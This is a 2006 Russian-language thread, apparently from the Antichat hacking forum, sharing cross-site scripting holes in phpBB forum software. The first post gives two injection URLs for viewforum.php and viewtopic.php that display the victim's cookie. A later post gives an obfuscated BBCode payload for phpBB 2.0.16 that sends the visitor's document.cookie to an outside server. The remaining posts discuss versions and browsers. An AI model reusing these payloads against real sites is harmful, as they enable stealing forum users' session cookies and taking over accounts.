ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

2 xss в PHPBB
  #1  
Старый 21.09.2006, 19:34
Аватар для alextoun
alextoun
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701

Репутация: 811


Отправить сообщение для alextoun с помощью ICQ
По умолчанию 2 xss в PHPBB

2 xss увидел в viewforum.php и viewtopic.php

Код:
viewforum.php?f=1&topicdays=99"><script>alert(document.cookie)</script>&start=30
Код:
viewtopic.php?t=10&postdays=99"><script>alert(document.cookie)</script>&start=20
...
 
Ответить с цитированием

  #2  
Старый 21.09.2006, 19:45
Аватар для SanyaX
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию

Хехе. Ради инетереса ты смотрел на какой версии тестировал + почему не написал в каких браузерах пашет а в каких нет? А так молодец! За старания свои + заслужил.
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #3  
Старый 21.09.2006, 19:51
Аватар для alextoun
alextoun
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701

Репутация: 811


Отправить сообщение для alextoun с помощью ICQ
По умолчанию

в эксплорере делал, а тестил на своём 2.0.6 форуме
 
Ответить с цитированием

  #4  
Старый 21.09.2006, 20:20
Аватар для DIAgen
DIAgen
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332

Репутация: 1276


По умолчанию

Цитата:
Сообщение от alextoun  
в эксплорере делал, а тестил на своём 2.0.6 форуме
phpBB 2.0.6: Выпущена в 2002 редкая версия.
А если phpBB 2.0.16
PHP код:
[*color=#EFEFEF][*url]www.ut[*url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th  is.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color] 
 
Ответить с цитированием

  #5  
Старый 21.09.2006, 20:51
Аватар для syntacsis
syntacsis
Участник форума
Регистрация: 14.11.2005
Сообщений: 146
Провел на форуме:
981128

Репутация: 43
По умолчанию

Вообще-то уже 2.0.21 на дворе =)
 
Ответить с цитированием

  #6  
Старый 21.09.2006, 21:39
Аватар для alextoun
alextoun
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701

Репутация: 811


Отправить сообщение для alextoun с помощью ICQ
По умолчанию

DIAgen извеняюсь 2.0.16, не увидел.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
exploit phpBB 2.0.19 ( by SpiderZ ) liauliau Форумы 21 13.01.2007 23:01
Подборка уязвимостей phpBB -=ka$at1k=- Форумы 3 02.07.2006 15:26
XSS, SQL-inj, PHP-inj и др. на примере phpBB pch Уязвимости 3 07.06.2006 15:26
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Эксперимент с xss, на форуме phpBB virgoz Форумы 3 31.10.2004 00:34



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ